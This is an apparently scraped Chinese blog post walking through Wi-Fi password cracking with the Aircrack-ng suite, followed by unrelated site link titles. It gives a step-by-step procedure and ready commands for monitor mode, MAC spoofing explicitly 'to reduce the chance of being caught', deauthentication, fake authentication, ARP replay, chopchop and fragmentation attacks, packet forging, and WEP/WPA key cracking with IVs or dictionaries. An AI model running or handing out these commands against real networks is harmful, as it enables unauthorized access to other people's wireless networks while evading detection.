zoukankan      html  css  js  c++  java
  • Linux:Aircrack-ng

    Aircrack-ng


    工具主要有
      airmon-ng 处理网卡工作模式
      airodump-ng 抓包
      aircrack-ng 破解
      aireplay-ng 发包,干扰
      另外还要用到以下 linux 命令:
      ifconfig 查看修改网卡状态和参数
      macchanger 伪造 MAC
      iwconfig 主要针对无线网卡的工具 (同 ifconfig)
      iwlist 获取无线网络的更详细信息
      
    具体破解步骤
      1. 修改无线网卡状态: down
      2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能
      3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
      4. 修改无线网卡状态: up
      5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
      6. 监听抓包:生成 .cap 或 .ivs
      7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
      8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解


    Crack Mode一共有5种
      airmon-ng start wlan0
      airodump-ng --ivs -w (目标路由器IVS文件) -c 6 mon0
      airodump-ng mon0

    crack mode
      1)

      aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC mon0

      2)
      aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC mon0
        3)
      aireplay-ng -3 -b 目标MAC -h 本机MAC mon0
      4)
      aireplay-ng -4 -b 目标MAC -h 本机MAC mon0
      packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
      aireplay-ng -2 -r MyArp -x 256 mon0
      5)
      aireplay-ng -5 -b 目标MAC -h 本机MACmon0
      packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
      aireplay-ng -2 -r MyArp -x 256 mon0


    Crack Key
      aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs

    命令的基本用法

    ifconfig

      用来配置网卡,我们这里主要用来 禁用和启用 网卡:

      ifconfig mon0 down

      ifconfig mon0 up

      禁用一下网卡的目的是为了下一步修改 MAC 。

    macchanger

      用来改变网卡的 MAC 地址,具体用法如下:

      useage: macchanger [options] device

      -h 显示帮助

      -V 显示版本

      -s 显示当前MAC

      -e 不改变mac,使用硬件厂商写入的MAC

      -a 自动生成一个同类型的MAC,同厂商的

      -A 自动生成一个不同类型的MAC,不同厂商的

      -r 生成任意MAC

      -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品

      -m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 mon0 。

    airmon-ng

      启动无线网卡进入 Monitor 模式,

      useage: airmon-ng <start|stop|check> <interface> [channel]

      <start|stop|check>启动,停止,检测

      <interface>指定无线网卡

      [channel] 监听频道

    iwconfig

      专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。

      useage:iwconfig interface [options]

      [essid{NN|ON|OFF}] 指定essid号 开启关闭

      [nwid{NN|on|off}] 指定网络id号 开启关闭

      [mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型

      [freq N.NNNN[K|M|G]] 指定工作频率

      [channel N] 指定频道

      [ap {N|off|auto}] 指定AP号 关闭/自动

      [sens N] sens 号

      [nick N] nick 号

      [rate {N|auto|fixed}] 速率控制

      [rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了

      [frag {N|auto|fixed|off}] 碎片控制

      [enc {NNNN-NNNN|off}] 范围

      [power {period N|timeout N}] 电源 频率/超时

      [retry {limit N|lifetime N}] 重试 限次/超时

      [txpower N{mw|dBm}] 功率 毫瓦/分贝

      [commit] 处理

    iwlist

      主要用来显示无线网卡的一些附加信息,同上

      useage: iwlist [interface] options

      scanning 扫描

      frequency 频率

      channel 频道

      bitrate 速率

      rate 速率

      encryption 加密

      key 密钥

      power 电源

      txpower 功率

      ap ap

      accespoints ap

      peers 直连

      event 事件

    airodump-ng

      useage: airodump-ng <options> <interface>[,<interface>,...]

      Options:

      --ivs :仅将抓取信息保存为 .ivs

      --gpsd :使用 GPSd

      --write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

      -w :同 --write

      --beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的

      --update <secs> :显示更新延迟

      --showack :显示ack/cts/rts状态

      -h :隐藏已知的,配合上面的选项使用

      -f <msecs> :跳频时间

      --berlin <secs> :无数据包接收时延迟显示的时间,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.

      -r <file> :从指定的文件读取数据包.

      Filter options:

      --encrypt <suite> : 使用密码序列过滤 AP

      --netmask <netmask> : 使用掩码过滤 AP

      --bssid <bssid> : 使用 bssid 过滤 AP

      -a : 过滤无关的客户端.

       默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:

      --channel <channels>:指定频道

      --band <abg> :制定带宽

      -C <frequencies> :指定频率MHz

      --cswitch <method> : 设置频道交换方式

      0 : FIFO (default) 先进先出(默认)

      1 : Round Robin 循环

      2 : Hop on last 最后一跳

      -s : 同上

      --help : 显示使用方法

    aireplay-ng

      useage: aireplay-ng <options> <replay interface>

      Filter options:

      -b bssid : AP的 MAC

      -d dmac : 目标的 MAC

      -s smac : 来源的 MAC

      -m len : 最小包长度

      -n len : 最大包长度

      -u type : 帧控制, type field

      -v subt : 帧控制, subtype field

      -t tods : 帧控制, To DS bit

      -f fromds : 帧控制, From DS bit

      -w iswep : 帧控制, WEP bit

      -D : 禁用 AP 发现功能

      Replay options:

      -x nbpps : 每秒包数量

      -p fctrl : 框架设定 (hex)

      -a bssid : 设置AP的 mac

      -c dmac : 设置目标的 MAC

      -h smac : 设置来源的 mac

      -g value : 改变环缓存大小 (默认8)

      -F : 选择第一个匹配的包

      Fakeauth attack options:

      -e essid : 设置目标 AP 的 SSID

      -o npckts : 每秒爆破的包数量 (0 自动, 默认 1)

      -q sec : 存活时间 秒

      -y prga : 共享可信的 key流

       Replay attack options:

      -j : 注入 fromDS 数据包

      Fragmentation attack options:

      -k IP : 设置目的IP 碎片

      -l IP : 设置源IP碎片

      Test attack options:

      -B : 激活 bitrate 测试

      source options:

      -i iface : 设置抓包的接口设备

      -r file : 从pcap文件析取数据包

      attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方

      --deauth count : 不信任一切 (-0)

      --fakeauth delay : 欺骗AP的信任 (-1)

      --interactive : 交互的选择 (-2)

      --arpreplay : 标准的 ARP欺骗原理-request replay (-3)

      --chopchop : 解密 WEP 包 (-4)

      --fragment : 生成有效的 key流 (-5)

      --caffe-latte : 从客户端获取新的 IVs (-6)

      --cfrag : 对客户端进行碎片攻击 (-7)

      --test : 测试注射及效果 (-9)

      --help : 显示帮助

    aircrack-ng

      useage: aircrack-ng [options] <.cap / .ivs file(s)>

      Common options:

      -a <amode> : 暴破 (1/WEP, 2/WPA-PSK)

      -e <essid> : 选择 essid 为目标

      -b <bssid> : 选择 ap的 mac 为目标

      -q : 使用安静模式,无数出模式

      -C <macs> : 将所有的 AP 合并为一个虚拟的

      Static WEP cracking options:

      -c : 仅搜索字母数字

      -t : 仅搜索二进制

      -h : 搜索数字关键

      -d <mask> : 指定掩码(A1:XX:CF:YY)

      -m <maddr> : 用 MAC 匹配可用的数据包

      -n <nbits> : WEP 长度 64/128/152/256/512

      -i <index> : WEP 索引(1 to 4), default: any

      -f <fudge> : 暴破强度默认2

      -k <korek> : 禁用一种破解方式 (1 to 17)

      -x or -x0 : 禁用最新关键字暴破

      -x1 : 使用最新关键字暴破 默认

      -x2 : 用最新两个字节暴破

      -y : 实验单线程模式

      -K : KoreK 攻击 (pre-PTW)

      -s : 显示为 ASCII

      -M <num> : 最大数量 ivs 使用

      -D : WEP 非隐蔽模式

      -P <num> : PTW debug: 1 disable Klein, 2 PTW

      -1 : 尝试一次 PTW

      WEP and WPA-PSK cracking options:

      -w <words> : 指定目录文件,可以多个

      -r <DB> : 制定 airolib-ng 数据库,不能和 -w 一起使用

      --help : 帮助

    实例

      

      ifconfig mon0 down

      macchanger -r mon0

      macchanger -r wlan0

      ifconfig mon0 up

      airmon-ng start mon0 

      iwconfig mon0

      iwlist mon0 scanning

      airodump-ng -w *.cap -c 6 mon0

      aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX mon0 aireplay-ng -5 -b ap_mac -h XXXXXXXXXX mon0

      aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 mon0

      aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB mon0

      aireplay-ng -3 -b <AP MAC> -h <my MAC> -i mon0

      aircrack-ng -x -f 2 *.cap

      aircrack-ng -w passdict.txt *.cap

      aircrack-ng -n 64 -b apmac *.ivs

  • 相关阅读:
    Qt计算器开发(三):执行效果及项目总结
    [HNOI2019]校园旅行
    How to fix nuget Unrecognized license type MIT when pack
    How to fix nuget Unrecognized license type MIT when pack
    git 通过 SublimeMerge 处理冲突
    git 通过 SublimeMerge 处理冲突
    git 上传当前分支
    git 上传当前分支
    gif 格式
    gif 格式
  • 原文地址:https://www.cnblogs.com/Spiro-K/p/6517676.html
Copyright © 2011-2022 走看看